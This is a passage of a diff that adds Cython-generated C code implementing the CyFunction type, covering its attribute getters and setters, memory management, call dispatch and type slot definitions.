__Pyx_Py_XDECREF_SET( + ((PyCMethodObject *) (f))->mm_class, + (PyTypeObject*)((classobj) ? __Pyx_NewRef(classobj) : NULL)); +#endif +} +static PyObject * +__Pyx_CyFunction_get_doc(__pyx_CyFunctionObject *op, void *closure) +{ + CYTHON_UNUSED_VAR(closure); + if (unlikely(op->func_doc == NULL)) { + if (((PyCFunctionObject*)op)->m_ml->ml_doc) { +#if PY_MAJOR_VERSION >= 3 + op->func_doc = PyUnicode_FromString(((PyCFunctionObject*)op)->m_ml->ml_doc); +#else + op->func_doc = PyString_FromString(((PyCFunctionObject*)op)->m_ml->ml_doc); +#endif + if (unlikely(op->func_doc == NULL)) + return NULL; + } else { + Py_INCREF(Py_None); + return Py_None; + } + } + Py_INCREF(op->func_doc); + return op->func_doc; +} +static int +__Pyx_CyFunction_set_doc(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (value == NULL) { + value = Py_None; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_doc, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_name(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (unlikely(op->func_name == NULL)) { +#if PY_MAJOR_VERSION >= 3 + op->func_name = PyUnicode_InternFromString(((PyCFunctionObject*)op)->m_ml->ml_name); +#else + op->func_name = PyString_InternFromString(((PyCFunctionObject*)op)->m_ml->ml_name); +#endif + if (unlikely(op->func_name == NULL)) + return NULL; + } + Py_INCREF(op->func_name); + return op->func_name; +} +static int +__Pyx_CyFunction_set_name(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); +#if PY_MAJOR_VERSION >= 3 + if (unlikely(value == NULL || !PyUnicode_Check(value))) +#else + if (unlikely(value == NULL || !PyString_Check(value))) +#endif + { + PyErr_SetString(PyExc_TypeError, + "__name__ must be set to a string object"); + return -1; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_name, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_qualname(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + Py_INCREF(op->func_qualname); + return op->func_qualname; +} +static int +__Pyx_CyFunction_set_qualname(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); +#if PY_MAJOR_VERSION >= 3 + if (unlikely(value == NULL || !PyUnicode_Check(value))) +#else + if (unlikely(value == NULL || !PyString_Check(value))) +#endif + { + PyErr_SetString(PyExc_TypeError, + "__qualname__ must be set to a string object"); + return -1; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_qualname, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_dict(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (unlikely(op->func_dict == NULL)) { + op->func_dict = PyDict_New(); + if (unlikely(op->func_dict == NULL)) + return NULL; + } + Py_INCREF(op->func_dict); + return op->func_dict; +} +static int +__Pyx_CyFunction_set_dict(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (unlikely(value == NULL)) { + PyErr_SetString(PyExc_TypeError, + "function's dictionary may not be deleted"); + return -1; + } + if (unlikely(!PyDict_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "setting function's dictionary to a non-dict"); + return -1; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_dict, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_globals(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + Py_INCREF(op->func_globals); + return op->func_globals; +} +static PyObject * +__Pyx_CyFunction_get_closure(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(op); + CYTHON_UNUSED_VAR(context); + Py_INCREF(Py_None); + return Py_None; +} +static PyObject * +__Pyx_CyFunction_get_code(__pyx_CyFunctionObject *op, void *context) +{ + PyObject* result = (op->func_code) ? op->func_code : Py_None; + CYTHON_UNUSED_VAR(context); + Py_INCREF(result); + return result; +} +static int +__Pyx_CyFunction_init_defaults(__pyx_CyFunctionObject *op) { + int result = 0; + PyObject *res = op->defaults_getter((PyObject *) op); + if (unlikely(!res)) + return -1; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + op->defaults_tuple = PyTuple_GET_ITEM(res, 0); + Py_INCREF(op->defaults_tuple); + op->defaults_kwdict = PyTuple_GET_ITEM(res, 1); + Py_INCREF(op->defaults_kwdict); + #else + op->defaults_tuple = PySequence_ITEM(res, 0); + if (unlikely(!op->defaults_tuple)) result = -1; + else { + op->defaults_kwdict = PySequence_ITEM(res, 1); + if (unlikely(!op->defaults_kwdict)) result = -1; + } + #endif + Py_DECREF(res); + return result; +} +static int +__Pyx_CyFunction_set_defaults(__pyx_CyFunctionObject *op, PyObject* value, void *context) { + CYTHON_UNUSED_VAR(context); + if (!value) { + value = Py_None; + } else if (unlikely(value != Py_None && !PyTuple_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "__defaults__ must be set to a tuple object"); + return -1; + } + PyErr_WarnEx(PyExc_RuntimeWarning, "changes to cyfunction.__defaults__ will not " + "currently affect the values used in function calls", 1); + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->defaults_tuple, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_defaults(__pyx_CyFunctionObject *op, void *context) { + PyObject* result = op->defaults_tuple; + CYTHON_UNUSED_VAR(context); + if (unlikely(!result)) { + if (op->defaults_getter) { + if (unlikely(__Pyx_CyFunction_init_defaults(op) < 0)) return NULL; + result = op->defaults_tuple; + } else { + result = Py_None; + } + } + Py_INCREF(result); + return result; +} +static int +__Pyx_CyFunction_set_kwdefaults(__pyx_CyFunctionObject *op, PyObject* value, void *context) { + CYTHON_UNUSED_VAR(context); + if (!value) { + value = Py_None; + } else if (unlikely(value != Py_None && !PyDict_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "__kwdefaults__ must be set to a dict object"); + return -1; + } + PyErr_WarnEx(PyExc_RuntimeWarning, "changes to cyfunction.__kwdefaults__ will not " + "currently affect the values used in function calls", 1); + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->defaults_kwdict, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_kwdefaults(__pyx_CyFunctionObject *op, void *context) { + PyObject* result = op->defaults_kwdict; + CYTHON_UNUSED_VAR(context); + if (unlikely(!result)) { + if (op->defaults_getter) { + if (unlikely(__Pyx_CyFunction_init_defaults(op) < 0)) return NULL; + result = op->defaults_kwdict; + } else { + result = Py_None; + } + } + Py_INCREF(result); + return result; +} +static int +__Pyx_CyFunction_set_annotations(__pyx_CyFunctionObject *op, PyObject* value, void *context) { + CYTHON_UNUSED_VAR(context); + if (!value || value == Py_None) { + value = NULL; + } else if (unlikely(!PyDict_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "__annotations__ must be set to a dict object"); + return -1; + } + Py_XINCREF(value); + __Pyx_Py_XDECREF_SET(op->func_annotations, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_annotations(__pyx_CyFunctionObject *op, void *context) { + PyObject* result = op->func_annotations; + CYTHON_UNUSED_VAR(context); + if (unlikely(!result)) { + result = PyDict_New(); + if (unlikely(!result)) return NULL; + op->func_annotations = result; + } + Py_INCREF(result); + return result; +} +static PyObject * +__Pyx_CyFunction_get_is_coroutine(__pyx_CyFunctionObject *op, void *context) { + int is_coroutine; + CYTHON_UNUSED_VAR(context); + if (op->func_is_coroutine) { + return __Pyx_NewRef(op->func_is_coroutine); + } + is_coroutine = op->flags & __Pyx_CYFUNCTION_COROUTINE; +#if PY_VERSION_HEX >= 0x03050000 + if (is_coroutine) { + PyObject *module, *fromlist, *marker = __pyx_n_s_is_coroutine; + fromlist = PyList_New(1); + if (unlikely(!fromlist)) return NULL; + Py_INCREF(marker); + PyList_SET_ITEM(fromlist, 0, marker); + module = PyImport_ImportModuleLevelObject(__pyx_n_s_asyncio_coroutines, NULL, NULL, fromlist, 0); + Py_DECREF(fromlist); + if (unlikely(!module)) goto ignore; + op->func_is_coroutine = __Pyx_PyObject_GetAttrStr(module, marker); + Py_DECREF(module); + if (likely(op->func_is_coroutine)) { + return __Pyx_NewRef(op->func_is_coroutine); + } +ignore: + PyErr_Clear(); + } +#endif + op->func_is_coroutine = __Pyx_PyBool_FromLong(is_coroutine); + return __Pyx_NewRef(op->func_is_coroutine); +} +static PyGetSetDef __pyx_CyFunction_getsets[] = { + {(char *) "func_doc", (getter)__Pyx_CyFunction_get_doc, (setter)__Pyx_CyFunction_set_doc, 0, 0}, + {(char *) "__doc__", (getter)__Pyx_CyFunction_get_doc, (setter)__Pyx_CyFunction_set_doc, 0, 0}, + {(char *) "func_name", (getter)__Pyx_CyFunction_get_name, (setter)__Pyx_CyFunction_set_name, 0, 0}, + {(char *) "__name__", (getter)__Pyx_CyFunction_get_name, (setter)__Pyx_CyFunction_set_name, 0, 0}, + {(char *) "__qualname__", (getter)__Pyx_CyFunction_get_qualname, (setter)__Pyx_CyFunction_set_qualname, 0, 0}, + {(char *) "func_dict", (getter)__Pyx_CyFunction_get_dict, (setter)__Pyx_CyFunction_set_dict, 0, 0}, + {(char *) "__dict__", (getter)__Pyx_CyFunction_get_dict, (setter)__Pyx_CyFunction_set_dict, 0, 0}, + {(char *) "func_globals", (getter)__Pyx_CyFunction_get_globals, 0, 0, 0}, + {(char *) "__globals__", (getter)__Pyx_CyFunction_get_globals, 0, 0, 0}, + {(char *) "func_closure", (getter)__Pyx_CyFunction_get_closure, 0, 0, 0}, + {(char *) "__closure__", (getter)__Pyx_CyFunction_get_closure, 0, 0, 0}, + {(char *) "func_code", (getter)__Pyx_CyFunction_get_code, 0, 0, 0}, + {(char *) "__code__", (getter)__Pyx_CyFunction_get_code, 0, 0, 0}, + {(char *) "func_defaults", (getter)__Pyx_CyFunction_get_defaults, (setter)__Pyx_CyFunction_set_defaults, 0, 0}, + {(char *) "__defaults__", (getter)__Pyx_CyFunction_get_defaults, (setter)__Pyx_CyFunction_set_defaults, 0, 0}, + {(char *) "__kwdefaults__", (getter)__Pyx_CyFunction_get_kwdefaults, (setter)__Pyx_CyFunction_set_kwdefaults, 0, 0}, + {(char *) "__annotations__", (getter)__Pyx_CyFunction_get_annotations, (setter)__Pyx_CyFunction_set_annotations, 0, 0}, + {(char *) "_is_coroutine", (getter)__Pyx_CyFunction_get_is_coroutine, 0, 0, 0}, + {0, 0, 0, 0, 0} +}; +static PyMemberDef __pyx_CyFunction_members[] = { + {(char *) "__module__", T_OBJECT, offsetof(PyCFunctionObject, m_module), 0, 0}, +#if CYTHON_USE_TYPE_SPECS + {(char *) "__dictoffset__", T_PYSSIZET, offsetof(__pyx_CyFunctionObject, func_dict), READONLY, 0}, +#if CYTHON_METH_FASTCALL +#if CYTHON_BACKPORT_VECTORCALL + {(char *) "__vectorcalloffset__", T_PYSSIZET, offsetof(__pyx_CyFunctionObject, func_vectorcall), READONLY, 0}, +#else + {(char *) "__vectorcalloffset__", T_PYSSIZET, offsetof(PyCFunctionObject, vectorcall), READONLY, 0}, +#endif +#endif +#if PY_VERSION_HEX < 0x030500A0 + {(char *) "__weaklistoffset__", T_PYSSIZET, offsetof(__pyx_CyFunctionObject, func_weakreflist), READONLY, 0}, +#else + {(char *) "__weaklistoffset__", T_PYSSIZET, offsetof(PyCFunctionObject, m_weakreflist), READONLY, 0}, +#endif +#endif + {0, 0, 0, 0, 0} +}; +static PyObject * +__Pyx_CyFunction_reduce(__pyx_CyFunctionObject *m, PyObject *args) +{ + CYTHON_UNUSED_VAR(args); +#if PY_MAJOR_VERSION >= 3 + Py_INCREF(m->func_qualname); + return m->func_qualname; +#else + return PyString_FromString(((PyCFunctionObject*)m)->m_ml->ml_name); +#endif +} +static PyMethodDef __pyx_CyFunction_methods[] = { + {"__reduce__", (PyCFunction)__Pyx_CyFunction_reduce, METH_VARARGS, 0}, + {0, 0, 0, 0} +}; +#if PY_VERSION_HEX < 0x030500A0 +#define __Pyx_CyFunction_weakreflist(cyfunc) ((cyfunc)->func_weakreflist) +#else +#define __Pyx_CyFunction_weakreflist(cyfunc) (((PyCFunctionObject*)cyfunc)->m_weakreflist) +#endif +static PyObject *__Pyx_CyFunction_Init(__pyx_CyFunctionObject *op, PyMethodDef *ml, int flags, PyObject* qualname, + PyObject *closure, PyObject *module, PyObject* globals, PyObject* code) { + PyCFunctionObject *cf = (PyCFunctionObject*) op; + if (unlikely(op == NULL)) + return NULL; + op->flags = flags; + __Pyx_CyFunction_weakreflist(op) = NULL; + cf->m_ml = ml; + cf->m_self = (PyObject *) op; + Py_XINCREF(closure); + op->func_closure = closure; + Py_XINCREF(module); + cf->m_module = module; + op->func_dict = NULL; + op->func_name = NULL; + Py_INCREF(qualname); + op->func_qualname = qualname; + op->func_doc = NULL; +#if PY_VERSION_HEX < 0x030900B1 + op->func_classobj = NULL; +#else + ((PyCMethodObject*)op)->mm_class = NULL; +#endif + op->func_globals = globals; + Py_INCREF(op->func_globals); + Py_XINCREF(code); + op->func_code = code; + op->defaults_pyobjects = 0; + op->defaults_size = 0; + op->defaults = NULL; + op->defaults_tuple = NULL; + op->defaults_kwdict = NULL; + op->defaults_getter = NULL; + op->func_annotations = NULL; + op->func_is_coroutine = NULL; +#if CYTHON_METH_FASTCALL + switch (ml->ml_flags & (METH_VARARGS | METH_FASTCALL | METH_NOARGS | METH_O | METH_KEYWORDS | METH_METHOD)) { + case METH_NOARGS: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_NOARGS; + break; + case METH_O: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_O; + break; + case METH_METHOD | METH_FASTCALL | METH_KEYWORDS: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS_METHOD; + break; + case METH_FASTCALL | METH_KEYWORDS: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS; + break; + case METH_VARARGS | METH_KEYWORDS: + __Pyx_CyFunction_func_vectorcall(op) = NULL; + break; + default: + PyErr_SetString(PyExc_SystemError, "Bad call flags for CyFunction"); + Py_DECREF(op); + return NULL; + } +#endif + return (PyObject *) op; +} +static int +__Pyx_CyFunction_clear(__pyx_CyFunctionObject *m) +{ + Py_CLEAR(m->func_closure); + Py_CLEAR(((PyCFunctionObject*)m)->m_module); + Py_CLEAR(m->func_dict); + Py_CLEAR(m->func_name); + Py_CLEAR(m->func_qualname); + Py_CLEAR(m->func_doc); + Py_CLEAR(m->func_globals); + Py_CLEAR(m->func_code); +#if PY_VERSION_HEX < 0x030900B1 + Py_CLEAR(__Pyx_CyFunction_GetClassObj(m)); +#else + { + PyObject *cls = (PyObject*) ((PyCMethodObject *) (m))->mm_class; + ((PyCMethodObject *) (m))->mm_class = NULL; + Py_XDECREF(cls); + } +#endif + Py_CLEAR(m->defaults_tuple); + Py_CLEAR(m->defaults_kwdict); + Py_CLEAR(m->func_annotations); + Py_CLEAR(m->func_is_coroutine); + if (m->defaults) { + PyObject **pydefaults = __Pyx_CyFunction_Defaults(PyObject *, m); + int i; + for (i = 0; i < m->defaults_pyobjects; i++) + Py_XDECREF(pydefaults[i]); + PyObject_Free(m->defaults); + m->defaults = NULL; + } + return 0; +} +static void __Pyx__CyFunction_dealloc(__pyx_CyFunctionObject *m) +{ + if (__Pyx_CyFunction_weakreflist(m) != NULL) + PyObject_ClearWeakRefs((PyObject *) m); + __Pyx_CyFunction_clear(m); + __Pyx_PyHeapTypeObject_GC_Del(m); +} +static void __Pyx_CyFunction_dealloc(__pyx_CyFunctionObject *m) +{ + PyObject_GC_UnTrack(m); + __Pyx__CyFunction_dealloc(m); +} +static int __Pyx_CyFunction_traverse(__pyx_CyFunctionObject *m, visitproc visit, void *arg) +{ + Py_VISIT(m->func_closure); + Py_VISIT(((PyCFunctionObject*)m)->m_module); + Py_VISIT(m->func_dict); + Py_VISIT(m->func_name); + Py_VISIT(m->func_qualname); + Py_VISIT(m->func_doc); + Py_VISIT(m->func_globals); + Py_VISIT(m->func_code); + Py_VISIT(__Pyx_CyFunction_GetClassObj(m)); + Py_VISIT(m->defaults_tuple); + Py_VISIT(m->defaults_kwdict); + Py_VISIT(m->func_is_coroutine); + if (m->defaults) { + PyObject **pydefaults = __Pyx_CyFunction_Defaults(PyObject *, m); + int i; + for (i = 0; i < m->defaults_pyobjects; i++) + Py_VISIT(pydefaults[i]); + } + return 0; +} +static PyObject* +__Pyx_CyFunction_repr(__pyx_CyFunctionObject *op) +{ +#if PY_MAJOR_VERSION >= 3 + return PyUnicode_FromFormat("", + op->func_qualname, (void *)op); +#else + return PyString_FromFormat("", + PyString_AsString(op->func_qualname), (void *)op); +#endif +} +static PyObject * __Pyx_CyFunction_CallMethod(PyObject *func, PyObject *self, PyObject *arg, PyObject *kw) { + PyCFunctionObject* f = (PyCFunctionObject*)func; + PyCFunction meth = f->m_ml->ml_meth; + Py_ssize_t size; + switch (f->m_ml->ml_flags & (METH_VARARGS | METH_KEYWORDS | METH_NOARGS | METH_O)) { + case METH_VARARGS: + if (likely(kw == NULL || PyDict_Size(kw) == 0)) + return (*meth)(self, arg); + break; + case METH_VARARGS | METH_KEYWORDS: + return (*(PyCFunctionWithKeywords)(void*)meth)(self, arg, kw); + case METH_NOARGS: + if (likely(kw == NULL || PyDict_Size(kw) == 0)) { + size = PyTuple_GET_SIZE(arg); + if (likely(size == 0)) + return (*meth)(self, NULL); + PyErr_Format(PyExc_TypeError, + "%.200s() takes no arguments (%" CYTHON_FORMAT_SSIZE_T "d given)", + f->m_ml->ml_name, size); + return NULL; + } + break; + case METH_O: + if (likely(kw == NULL || PyDict_Size(kw) == 0)) { + size = PyTuple_GET_SIZE(arg); + if (likely(size == 1)) { + PyObject *result, *arg0; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + arg0 = PyTuple_GET_ITEM(arg, 0); + #else + arg0 = PySequence_ITEM(arg, 0); if (unlikely(!arg0)) return NULL; + #endif + result = (*meth)(self, arg0); + #if !(CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS) + Py_DECREF(arg0); + #endif + return result; + } + PyErr_Format(PyExc_TypeError, + "%.200s() takes exactly one argument (%" CYTHON_FORMAT_SSIZE_T "d given)", + f->m_ml->ml_name, size); + return NULL; + } + break; + default: + PyErr_SetString(PyExc_SystemError, "Bad call flags for CyFunction"); + return NULL; + } + PyErr_Format(PyExc_TypeError, "%.200s() takes no keyword arguments", + f->m_ml->ml_name); + return NULL; +} +static CYTHON_INLINE PyObject *__Pyx_CyFunction_Call(PyObject *func, PyObject *arg, PyObject *kw) { + return __Pyx_CyFunction_CallMethod(func, ((PyCFunctionObject*)func)->m_self, arg, kw); +} +static PyObject *__Pyx_CyFunction_CallAsMethod(PyObject *func, PyObject *args, PyObject *kw) { + PyObject *result; + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *) func; +#if CYTHON_METH_FASTCALL + __pyx_vectorcallfunc vc = __Pyx_CyFunction_func_vectorcall(cyfunc); + if (vc) { +#if CYTHON_ASSUME_SAFE_MACROS + return __Pyx_PyVectorcall_FastCallDict(func, vc, &PyTuple_GET_ITEM(args, 0), (size_t)PyTuple_GET_SIZE(args), kw); +#else + (void) &__Pyx_PyVectorcall_FastCallDict; + return PyVectorcall_Call(func, args, kw); +#endif + } +#endif + if ((cyfunc->flags & __Pyx_CYFUNCTION_CCLASS) && !(cyfunc->flags & __Pyx_CYFUNCTION_STATICMETHOD)) { + Py_ssize_t argc; + PyObject *new_args; + PyObject *self; + argc = PyTuple_GET_SIZE(args); + new_args = PyTuple_GetSlice(args, 1, argc); + if (unlikely(!new_args)) + return NULL; + self = PyTuple_GetItem(args, 0); + if (unlikely(!self)) { + Py_DECREF(new_args); +#if PY_MAJOR_VERSION > 2 + PyErr_Format(PyExc_TypeError, + "unbound method %.200S() needs an argument", + cyfunc->func_qualname); +#else + PyErr_SetString(PyExc_TypeError, + "unbound method needs an argument"); +#endif + return NULL; + } + result = __Pyx_CyFunction_CallMethod(func, self, new_args, kw); + Py_DECREF(new_args); + } else { + result = __Pyx_CyFunction_Call(func, args, kw); + } + return result; +} +#if CYTHON_METH_FASTCALL +static CYTHON_INLINE int __Pyx_CyFunction_Vectorcall_CheckArgs(__pyx_CyFunctionObject *cyfunc, Py_ssize_t nargs, PyObject *kwnames) +{ + int ret = 0; + if ((cyfunc->flags & __Pyx_CYFUNCTION_CCLASS) && !(cyfunc->flags & __Pyx_CYFUNCTION_STATICMETHOD)) { + if (unlikely(nargs < 1)) { + PyErr_Format(PyExc_TypeError, "%.200s() needs an argument", + ((PyCFunctionObject*)cyfunc)->m_ml->ml_name); + return -1; + } + ret = 1; + } + if (unlikely(kwnames) && unlikely(PyTuple_GET_SIZE(kwnames))) { + PyErr_Format(PyExc_TypeError, + "%.200s() takes no keyword arguments", ((PyCFunctionObject*)cyfunc)->m_ml->ml_name); + return -1; + } + return ret; +} +static PyObject * __Pyx_CyFunction_Vectorcall_NOARGS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, kwnames)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + if (unlikely(nargs != 0)) { + PyErr_Format(PyExc_TypeError, + "%.200s() takes no arguments (%" CYTHON_FORMAT_SSIZE_T "d given)", + def->ml_name, nargs); + return NULL; + } + return def->ml_meth(self, NULL); +} +static PyObject * __Pyx_CyFunction_Vectorcall_O(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, kwnames)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + if (unlikely(nargs != 1)) { + PyErr_Format(PyExc_TypeError, + "%.200s() takes exactly one argument (%" CYTHON_FORMAT_SSIZE_T "d given)", + def->ml_name, nargs); + return NULL; + } + return def->ml_meth(self, args[0]); +} +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, NULL)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + return ((_PyCFunctionFastWithKeywords)(void(*)(void))def->ml_meth)(self, args, nargs, kwnames); +} +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS_METHOD(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; + PyTypeObject *cls = (PyTypeObject *) __Pyx_CyFunction_GetClassObj(cyfunc); +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, NULL)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + return ((__Pyx_PyCMethod)(void(*)(void))def->ml_meth)(self, cls, args, (size_t)nargs, kwnames); +} +#endif +#if CYTHON_USE_TYPE_SPECS +static PyType_Slot __pyx_CyFunctionType_slots[] = { + {Py_tp_dealloc, (void *)__Pyx_CyFunction_dealloc}, + {Py_tp_repr, (void *)__Pyx_CyFunction_repr}, + {Py_tp_call, (void *)__Pyx_CyFunction_CallAsMethod}, + {Py_tp_traverse, (void *)__Pyx_CyFunction_traverse}, + {Py_tp_clear, (void *)__Pyx_CyFunction_clear}, + {Py_tp_methods, (void *)__pyx_CyFunction_methods}, + {Py_tp_members, (void *)__pyx_CyFunction_members}, + {Py_tp_getset, (void *)__pyx_CyFunction_getsets}, + {Py_tp_descr_get, (void *)__Pyx_PyMethod_New}, + {0, 0}, +}; +static PyType_Spec __pyx_CyFunctionType_spec = { + __PYX_TYPE_MODULE_PREFIX "cython_function_or_method", + sizeof(__pyx_CyFunctionObject), + 0, +#ifdef Py_TPFLAGS_METHOD_DESCRIPTOR + Py_TPFLAGS_METHOD_DESCRIPTOR | +#endif +#if (defined(_Py_TPFLAGS_HAVE_VECTORCALL) && CYTHON_METH_FASTCALL) + _Py_TPFLAGS_HAVE_VECTORCALL | +#endif + Py_TPFLAGS_DEFAULT | Py_TPFLAGS_HAVE_GC | Py_TPFLAGS_BASETYPE, + __pyx_CyFunctionType_slots +}; +#else +static PyTypeObject __pyx_CyFunctionType_type = { + PyVarObject_HEAD_INIT(0, 0) + __PYX_TYPE_MODULE_PREFIX "cython_function_or_method", + sizeof(__pyx_CyFunctionObject), + 0, + (destructor) __Pyx_CyFunction_dealloc, +#if !CYTHON_METH_FASTCALL + 0, +#elif CYTHON_BACKPORT_VECTORCALL + (printfunc)offsetof(__pyx_CyFunctionObject, func_vectorcall), +#else + offsetof(PyCFunctionObject, vectorcall), +#endif + 0, + 0, +#if PY_MAJOR_VERSION < 3 + 0, +#else + 0, +#endif + (reprfunc) __Pyx_CyFunction_repr, + 0, + 0, + 0, + 0, + __Pyx_CyFunction_CallAsMethod, + 0, + 0, + 0, + 0, +#ifdef Py_TPFLAGS_METHOD_DESCRIPTOR + Py_TPFLAGS_METHOD_DESCRIPTOR | +#endif +#ifdef _Py_TPFLAGS_HAVE_VECTORCALL + _Py_TPFLAGS_HAVE_VECTORCALL | +#endif + Py_TPFLAGS_DEFAULT | Py_TPFLAGS_HAVE_GC | Py_TPFLAGS_BASETYPE, + 0, + (traverseproc) __Pyx_CyFunction_traverse, + (inquiry) __Pyx_CyFunction_clear, + 0, +#if PY_VERSION_HEX < 0x030500A0 + offsetof(__pyx_CyFunctionObject, func_weakreflist), +#else + offsetof(PyCFunctionObject, m_weakreflist), +#endif + 0, + 0, + __pyx_CyFunction_methods, + __pyx_CyFunction_members, + __pyx_CyFunction_getsets, + 0, + 0, + __Pyx_PyMethod_New, + 0, + offsetof(__pyx_CyFunctionObject, func_dict), + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, +#if PY_VERSION_HEX >= 0x030400a1 + 0, +#endif +#if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, +#endif +#if __PYX_NEED_TP_PRINT_SLOT + 0, +#endif +#if PY_VERSION_HEX >= 0x030C0000 + 0, +#endif +#if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, +#endif +}; +#endif +static int __pyx_CyFunction_init(PyObject *module) { +#if CYTHON_USE_TYPE_SPECS + __pyx_CyFunctionType = __Pyx_FetchCommonTypeFromSpec(module, &__pyx_CyFunctionType_spec, NULL); +#else + CYTHON_UNUSED_VAR(module); + __pyx_CyFunctionType = __Pyx_FetchCommonType(&__pyx_CyFunctionType_type); +#endif + if (unlikely(__pyx_CyFunctionType == NULL)) { + return -1; + } + return 0; +} +static CYTHON_INLINE void *__Pyx_CyFunction_InitDefaults(PyObject *func, size_t size, int pyobjects) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->defaults = PyObject_Malloc(size); + if (unlikely(!m->defaults)) + return PyErr_NoMemory(); + memset(m->defaults, 0, size); + m->defaults_pyobjects = pyobjects; + m->defaults_size = size; + return m->defaults; +} +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsTuple(PyObject *func, PyObject *tuple) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->defaults_tuple = tuple; + Py_INCREF(tuple); +} +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsKwDict(PyObject *func, PyObject *dict) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->defaults_kwdict = dict; + Py_INCREF(dict); +} +static CYTHON_INLINE void __Pyx_CyFunction_SetAnnotationsDict(PyObject *func, PyObject 